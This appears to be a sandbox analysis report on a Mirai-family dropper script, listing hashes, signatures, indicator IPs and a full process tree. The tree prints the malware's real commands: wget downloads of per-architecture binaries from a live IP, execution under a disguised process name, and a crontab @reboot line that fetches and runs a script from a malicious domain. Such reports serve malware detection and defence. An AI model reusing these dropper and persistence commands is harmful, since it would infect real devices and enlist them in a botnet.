Analysis
- max time kernel: 138s
- max time network: 146s
- platform: ubuntu-18.04_amd64
- resource: ubuntu1804-amd64-20240729-en
- resource tags: arch:amd64 arch:i386 image:ubuntu1804-amd64-20240729-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system
- submitted: 09-11-2024 08:41
Static task
- static1
Behavioral tasks
- behavioral1: sample l.sh, resource ubuntu1804-amd64-20240729-en
- behavioral2: sample l.sh, resource debian9-armhf-20240611-en
- behavioral3: sample l.sh, resource debian9-mipsbe-20240418-en
- behavioral4: sample l.sh, resource debian9-mipsel-20240611-en
General
- Target: l.sh
- Size: 916B
- MD5: 19c4fe1b103747e55af818fc3f07fdbe
- SHA1: ccb4350c6ce8bb9449a9dc5dfa4910762d1d9fe8
- SHA256: 7bad123032a0e9a4f6d7a399b7d7a171c24f505201186d679ca495ba936195bd
- SHA512: 2d3f697da5886721e51cbc720a77c9c755027d361a7e139de80be1ee5c2dd1c76a20d3c33fb32177a5318400fbec36555c93cd9b860e398b5b1fd73e3c5fa270
Malware Config
- Extracted: mirai BOTNET
Signatures
- Mirai family
- File and Directory Permissions Modification (1 TTPs, 27 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  Processes (pid process):
    chmod: 1686, 1691, 1696, 1701, 1706, 1711, 1716, 1721, 1731, 1736, 1741, 1746, 1751, 1756, 1761, 1766, 1775, 1780, 1785, 1790, 1795, 1800, 1805, 1810
    sh: 1723, 1768, 1812
- Executes dropped EXE (24 IoCs)
  Processes (ioc pid process):
    /tmp/lib/dvrLocker: 1687, 1692, 1697, 1702, 1707, 1712, 1717, 1722 (dvrLocker)
    /mnt/dvrLocker: 1732, 1737, 1742, 1747, 1752, 1757, 1762, 1767, 1776, 1781, 1786, 1791, 1796, 1801, 1806, 1811 (dvrLocker)
- Renames itself (3 IoCs)
  Processes (pid process): 1722 dvrLocker, 1767 dvrLocker, 1811 dvrLocker
- Unexpected DNS network traffic destination (3 IoCs)
  Network traffic to other servers than the configured DNS servers was detected on the DNS port.
  IoCs (description ioc): Destination IP 5.161.109.23; Destination IP 202.61.197.122; Destination IP 64.176.6.48
- Creates/modifies Cron job (1 TTPs, 3 IoCs)
  Cron allows running tasks on a schedule, and is commonly used for malware persistence.
  Processes (description ioc process):
    File opened for modification /var/spool/cron/crontabs/tmp.kwgToV (crontab)
    File opened for modification /var/spool/cron/crontabs/tmp.jeG6xK (crontab)
    File opened for modification /var/spool/cron/crontabs/tmp.k7lYiR (crontab)
- Changes its process name (3 IoCs)
  Processes (description ioc pid process):
    Changes the process name, possibly in an attempt to hide itself: [kswapd0] 1722 dvrLocker
    Changes the process name, possibly in an attempt to hide itself: mini_httpd 1767 dvrLocker
    Changes the process name, possibly in an attempt to hide itself: [kswapd0] 1811 dvrLocker
- Reads runtime system information
  Processes (description ioc process):
    File opened for reading /proc/filesystems (ls); one entry for each ls process flagged "Reads runtime system information" in the process tree below
- System Network Configuration Discovery (1 TTPs, 6 IoCs)
  Adversaries may gather information about the network configuration of a system.
  Processes (pid process): 1690 wget, 1694 rm, 1735 wget, 1739 rm, 1779 wget, 1783 rm
- Writes file to tmp directory (1 IoCs)
  Malware often drops required files in the /tmp directory.
  Processes (description ioc process): File opened for modification /tmp/lib/dvrLocker (l.sh)
Processes
Indentation shows the process tree depth; each entry lists PID, image path, command line, and the signatures it triggered in brackets.
1509  /tmp/l.sh  /tmp/l.sh  [Writes file to tmp directory]
  1510  /bin/ls  ls -l /proc/1/exe  [Reads runtime system information]
  1511  /bin/ls  ls -l /proc/10/exe  [Reads runtime system information]
  1512  /bin/ls  ls -l /proc/1017/exe  [Reads runtime system information]
  1513  /bin/ls  ls -l /proc/1022/exe  [Reads runtime system information]
  1514  /bin/ls  ls -l /proc/1036/exe  [Reads runtime system information]
  1515  /bin/ls  ls -l /proc/1042/exe  [Reads runtime system information]
  1516  /bin/ls  ls -l /proc/1056/exe  [Reads runtime system information]
  1517  /bin/ls  ls -l /proc/1060/exe
  1518  /bin/ls  ls -l /proc/1063/exe  [Reads runtime system information]
  1519  /bin/ls  ls -l /proc/1066/exe
  1520  /bin/ls  ls -l /proc/1070/exe  [Reads runtime system information]
  1521  /bin/ls  ls -l /proc/1080/exe  [Reads runtime system information]
  1522  /bin/ls  ls -l /proc/1084/exe
  1523  /bin/ls  ls -l /proc/1093/exe  [Reads runtime system information]
  1524  /bin/ls  ls -l /proc/11/exe
  1525  /bin/ls  ls -l /proc/1108/exe
  1526  /bin/ls  ls -l /proc/1113/exe  [Reads runtime system information]
  1527  /bin/ls  ls -l /proc/1117/exe  [Reads runtime system information]
  1528  /bin/ls  ls -l /proc/1121/exe
  1529  /bin/ls  ls -l /proc/1125/exe
  1530  /bin/ls  ls -l /proc/1129/exe
  1531  /bin/ls  ls -l /proc/1133/exe
  1532  /bin/ls  ls -l /proc/1138/exe
  1533  /bin/ls  ls -l /proc/1142/exe
  1534  /bin/ls  ls -l /proc/1143/exe
  1535  /bin/ls  ls -l /proc/1146/exe
  1536  /bin/ls  ls -l /proc/1149/exe  [Reads runtime system information]
  1537  /bin/ls  ls -l /proc/115/exe
  1538  /bin/ls  ls -l /proc/1151/exe
  1539  /bin/ls  ls -l /proc/1161/exe
  1540  /bin/ls  ls -l /proc/1163/exe  [Reads runtime system information]
  1541  /bin/ls  ls -l /proc/1165/exe  [Reads runtime system information]
  1542  /bin/ls  ls -l /proc/1166/exe
  1543  /bin/ls  ls -l /proc/1171/exe
  1544  /bin/ls  ls -l /proc/1179/exe  [Reads runtime system information]
  1548  /bin/ls  ls -l /proc/1182/exe
  1549  /bin/ls  ls -l /proc/1183/exe
  1550  /bin/ls  ls -l /proc/1184/exe
  1551  /bin/ls  ls -l /proc/1185/exe  [Reads runtime system information]
  1552  /bin/ls  ls -l /proc/1188/exe
  1553  /bin/ls  ls -l /proc/1191/exe
  1554  /bin/ls  ls -l /proc/12/exe
  1555  /bin/ls  ls -l /proc/1226/exe
  1556  /bin/ls  ls -l /proc/1228/exe
  1557  /bin/ls  ls -l /proc/1255/exe
  1558  /bin/ls  ls -l /proc/1256/exe
  1559  /bin/ls  ls -l /proc/1269/exe
  1560  /bin/ls  ls -l /proc/1282/exe
  1561  /bin/ls  ls -l /proc/1287/exe
  1562  /bin/ls  ls -l /proc/1297/exe
  1563  /bin/ls  ls -l /proc/13/exe
  1564  /bin/ls  ls -l /proc/1308/exe
  1565  /bin/ls  ls -l /proc/1313/exe  [Reads runtime system information]
  1566  /bin/ls  ls -l /proc/1317/exe  [Reads runtime system information]
  1567  /bin/ls  ls -l /proc/1339/exe
  1568  /bin/ls  ls -l /proc/1349/exe  [Reads runtime system information]
  1569  /bin/ls  ls -l /proc/137/exe  [Reads runtime system information]
  1570  /bin/ls  ls -l /proc/1379/exe
  1571  /bin/ls  ls -l /proc/14/exe  [Reads runtime system information]
  1572  /bin/ls  ls -l /proc/1478/exe  [Reads runtime system information]
  1573  /bin/ls  ls -l /proc/1497/exe
  1574  /bin/ls  ls -l /proc/15/exe
  1575  /bin/ls  ls -l /proc/1503/exe  [Reads runtime system information]
  1576  /bin/ls  ls -l /proc/1505/exe  [Reads runtime system information]
  1577  /bin/ls  ls -l /proc/1506/exe
  1578  /bin/ls  ls -l /proc/1507/exe
  1579  /bin/ls  ls -l /proc/1509/exe  [Reads runtime system information]
  1580  /bin/ls  ls -l /proc/159/exe
  1581  /bin/ls  ls -l /proc/16/exe  [Reads runtime system information]
  1582  /bin/ls  ls -l /proc/160/exe  [Reads runtime system information]
  1583  /bin/ls  ls -l /proc/161/exe
  1584  /bin/ls  ls -l /proc/162/exe
  1585  /bin/ls  ls -l /proc/163/exe
  1586  /bin/ls  ls -l /proc/164/exe
  1587  /bin/ls  ls -l /proc/165/exe  [Reads runtime system information]
  1588  /bin/ls  ls -l /proc/166/exe
  1589  /bin/ls  ls -l /proc/167/exe  [Reads runtime system information]
  1590  /bin/ls  ls -l /proc/168/exe
  1591  /bin/ls  ls -l /proc/169/exe
  1592  /bin/ls  ls -l /proc/17/exe
  1593  /bin/ls  ls -l /proc/170/exe  [Reads runtime system information]
  1594  /bin/ls  ls -l /proc/171/exe
  1595  /bin/ls  ls -l /proc/172/exe
  1596  /bin/ls  ls -l /proc/173/exe  [Reads runtime system information]
  1597  /bin/ls  ls -l /proc/174/exe  [Reads runtime system information]
  1598  /bin/ls  ls -l /proc/175/exe
  1599  /bin/ls  ls -l /proc/176/exe  [Reads runtime system information]
  1600  /bin/ls  ls -l /proc/178/exe
  1601  /bin/ls  ls -l /proc/18/exe
  1602  /bin/ls  ls -l /proc/19/exe
  1603  /bin/ls  ls -l /proc/2/exe  [Reads runtime system information]
  1604  /bin/ls  ls -l /proc/20/exe  [Reads runtime system information]
  1605  /bin/ls  ls -l /proc/203/exe  [Reads runtime system information]
  1606  /bin/ls  ls -l /proc/204/exe
  1607  /bin/ls  ls -l /proc/21/exe
  1608  /bin/ls  ls -l /proc/22/exe
  1609  /bin/ls  ls -l /proc/23/exe  [Reads runtime system information]
  1610  /bin/ls  ls -l /proc/24/exe
  1611  /bin/ls  ls -l /proc/244/exe  [Reads runtime system information]
  1612  /bin/ls  ls -l /proc/25/exe
  1613  /bin/ls  ls -l /proc/26/exe  [Reads runtime system information]
  1614  /bin/ls  ls -l /proc/269/exe
  1615  /bin/ls  ls -l /proc/27/exe
  1616  /bin/ls  ls -l /proc/28/exe
  1617  /bin/ls  ls -l /proc/29/exe
  1618  /bin/ls  ls -l /proc/3/exe  [Reads runtime system information]
  1619  /bin/ls  ls -l /proc/30/exe
  1620  /bin/ls  ls -l /proc/309/exe
  1621  /bin/ls  ls -l /proc/31/exe
  1622  /bin/ls  ls -l /proc/313/exe
  1623  /bin/ls  ls -l /proc/32/exe  [Reads runtime system information]
  1624  /bin/ls  ls -l /proc/34/exe  [Reads runtime system information]
  1625  /bin/ls  ls -l /proc/35/exe
  1626  /bin/ls  ls -l /proc/36/exe  [Reads runtime system information]
  1627  /bin/ls  ls -l /proc/4/exe  [Reads runtime system information]
  1628  /bin/ls  ls -l /proc/405/exe
  1629  /bin/ls  ls -l /proc/412/exe
  1630  /bin/ls  ls -l /proc/436/exe
  1631  /bin/ls  ls -l /proc/443/exe
  1632  /bin/ls  ls -l /proc/454/exe
  1633  /bin/ls  ls -l /proc/457/exe
  1634  /bin/ls  ls -l /proc/463/exe
  1635  /bin/ls  ls -l /proc/466/exe
  1636  /bin/ls  ls -l /proc/472/exe  [Reads runtime system information]
  1637  /bin/ls  ls -l /proc/473/exe
  1638  /bin/ls  ls -l /proc/474/exe  [Reads runtime system information]
  1639  /bin/ls  ls -l /proc/476/exe
  1640  /bin/ls  ls -l /proc/480/exe
  1641  /bin/ls  ls -l /proc/484/exe
  1642  /bin/ls  ls -l /proc/485/exe
  1643  /bin/ls  ls -l /proc/487/exe  [Reads runtime system information]
  1644  /bin/ls  ls -l /proc/5/exe
  1645  /bin/ls  ls -l /proc/516/exe
  1646  /bin/ls  ls -l /proc/523/exe
  1647  /bin/ls  ls -l /proc/535/exe  [Reads runtime system information]
  1648  /bin/ls  ls -l /proc/542/exe
  1649  /bin/ls  ls -l /proc/552/exe
  1650  /bin/ls  ls -l /proc/573/exe  [Reads runtime system information]
  1651  /bin/ls  ls -l /proc/597/exe
  1652  /bin/ls  ls -l /proc/598/exe
  1653  /bin/ls  ls -l /proc/6/exe  [Reads runtime system information]
  1654  /bin/ls  ls -l /proc/634/exe
  1655  /bin/ls  ls -l /proc/648/exe
  1656  /bin/ls  ls -l /proc/649/exe  [Reads runtime system information]
  1657  /bin/ls  ls -l /proc/651/exe  [Reads runtime system information]
  1658  /bin/ls  ls -l /proc/658/exe
  1659  /bin/ls  ls -l /proc/670/exe  [Reads runtime system information]
  1660  /bin/ls  ls -l /proc/697/exe
  1661  /bin/ls  ls -l /proc/7/exe
  1662  /bin/ls  ls -l /proc/744/exe
  1663  /bin/ls  ls -l /proc/757/exe  [Reads runtime system information]
  1664  /bin/ls  ls -l /proc/78/exe
  1665  /bin/ls  ls -l /proc/79/exe  [Reads runtime system information]
  1666  /bin/ls  ls -l /proc/8/exe  [Reads runtime system information]
  1667  /bin/ls  ls -l /proc/80/exe
  1668  /bin/ls  ls -l /proc/81/exe  [Reads runtime system information]
  1669  /bin/ls  ls -l /proc/82/exe  [Reads runtime system information]
  1670  /bin/ls  ls -l /proc/83/exe  [Reads runtime system information]
  1671  /bin/ls  ls -l /proc/84/exe  [Reads runtime system information]
  1672  /bin/ls  ls -l /proc/85/exe
  1673  /bin/ls  ls -l /proc/89/exe  [Reads runtime system information]
  1674  /bin/ls  ls -l /proc/895/exe
  1675  /bin/ls  ls -l /proc/9/exe
  1676  /bin/ls  ls -l /proc/949/exe
  1677  /bin/ls  ls -l /proc/950/exe
  1678  /bin/ls  ls -l /proc/98/exe  [Reads runtime system information]
  1679  /bin/ls  ls -l /proc/985/exe
  1680  /bin/ls  ls -l /proc/990/exe
  1681  /bin/ls  ls -l /proc/993/exe
  1682  /bin/rm  rm -rf /tmp/lib/
  1683  /bin/rm  rm -rf /tmp/lib/dvrLocker
  1684  /bin/mkdir  mkdir /tmp/lib/
  1685  /usr/bin/wget  wget http://45.202.35.91/mpsl -O -
  1686  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  1687  /tmp/lib/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  1689  /bin/rm  rm -rf mpsl
  1690  /usr/bin/wget  wget http://45.202.35.91/mips -O -  [System Network Configuration Discovery]
  1691  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  1692  /tmp/lib/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  1694  /bin/rm  rm -rf mips  [System Network Configuration Discovery]
  1695  /usr/bin/wget  wget http://45.202.35.91/arm -O -
  1696  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  1697  /tmp/lib/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  1699  /bin/rm  rm -rf arm
  1700  /usr/bin/wget  wget http://45.202.35.91/arm5 -O -
  1701  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  1702  /tmp/lib/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  1704  /bin/rm  rm -rf arm5
  1705  /usr/bin/wget  wget http://45.202.35.91/ppc -O -
  1706  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  1707  /tmp/lib/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  1709  /bin/rm  rm -rf ppc
  1710  /usr/bin/wget  wget http://45.202.35.91/arm7 -O -
  1711  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  1712  /tmp/lib/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  1714  /bin/rm  rm -rf arm7
  1715  /usr/bin/wget  wget http://45.202.35.91/arm6 -O -
  1716  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  1717  /tmp/lib/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  1719  /bin/rm  rm -rf arm6
  1720  /usr/bin/wget  wget http://45.202.35.91/x86 -O -
  1721  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  1722  /tmp/lib/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE; Renames itself; Changes its process name]
    1723  /bin/sh  sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"  [File and Directory Permissions Modification]
      1725  /usr/bin/crontab  crontab -  [Creates/modifies Cron job]
      1726  /usr/bin/crontab  crontab -l
  1728  /bin/rm  rm -rf x86
  1729  /bin/rm  rm -rf /mnt/dvrLocker
  1730  /usr/bin/wget  wget http://45.202.35.91/mpsl -O -
  1731  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  1732  /mnt/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  1734  /bin/rm  rm -rf mpsl
  1735  /usr/bin/wget  wget http://45.202.35.91/mips -O -  [System Network Configuration Discovery]
  1736  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  1737  /mnt/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  1739  /bin/rm  rm -rf mips  [System Network Configuration Discovery]
  1740  /usr/bin/wget  wget http://45.202.35.91/arm -O -
  1741  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  1742  /mnt/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  1744  /bin/rm  rm -rf arm
  1745  /usr/bin/wget  wget http://45.202.35.91/arm5 -O -
  1746  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  1747  /mnt/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  1749  /bin/rm  rm -rf arm5
  1750  /usr/bin/wget  wget http://45.202.35.91/ppc -O -
  1751  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  1752  /mnt/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  1754  /bin/rm  rm -rf ppc
  1755  /usr/bin/wget  wget http://45.202.35.91/arm7 -O -
  1756  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  1757  /mnt/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  1759  /bin/rm  rm -rf arm7
  1760  /usr/bin/wget  wget http://45.202.35.91/arm6 -O -
  1761  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  1762  /mnt/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  1764  /bin/rm  rm -rf arm6
  1765  /usr/bin/wget  wget http://45.202.35.91/x86 -O -
  1766  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  1767  /mnt/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE; Renames itself; Changes its process name]
    1768  /bin/sh  sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"  [File and Directory Permissions Modification]
      1770  /usr/bin/crontab  crontab -  [Creates/modifies Cron job]
      1771  /usr/bin/crontab  crontab -l
  1773  /bin/rm  rm -rf x86
  1774  /usr/bin/wget  wget http://45.202.35.91/mpsl -O -
  1775  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  1776  /mnt/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  1778  /bin/rm  rm -rf mpsl
  1779  /usr/bin/wget  wget http://45.202.35.91/mips -O -  [System Network Configuration Discovery]
  1780  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  1781  /mnt/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  1783  /bin/rm  rm -rf mips  [System Network Configuration Discovery]
  1784  /usr/bin/wget  wget http://45.202.35.91/arm -O -
  1785  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  1786  /mnt/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  1788  /bin/rm  rm -rf arm
  1789  /usr/bin/wget  wget http://45.202.35.91/arm5 -O -
  1790  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  1791  /mnt/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  1793  /bin/rm  rm -rf arm5
  1794  /usr/bin/wget  wget http://45.202.35.91/ppc -O -
  1795  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  1796  /mnt/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  1798  /bin/rm  rm -rf ppc
  1799  /usr/bin/wget  wget http://45.202.35.91/arm7 -O -
  1800  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  1801  /mnt/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  1803  /bin/rm  rm -rf arm7
  1804  /usr/bin/wget  wget http://45.202.35.91/arm6 -O -
  1805  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  1806  /mnt/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  1808  /bin/rm  rm -rf arm6
  1809  /usr/bin/wget  wget http://45.202.35.91/x86 -O -
  1810  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  1811  /mnt/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE; Renames itself; Changes its process name]
    1812  /bin/sh  sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"  [File and Directory Permissions Modification]
      1814  /usr/bin/crontab  crontab -  [Creates/modifies Cron job]
      1815  /usr/bin/crontab  crontab -l
  1817  /bin/rm  rm -rf x86
Network
MITRE ATT&CK Enterprise v15
Downloads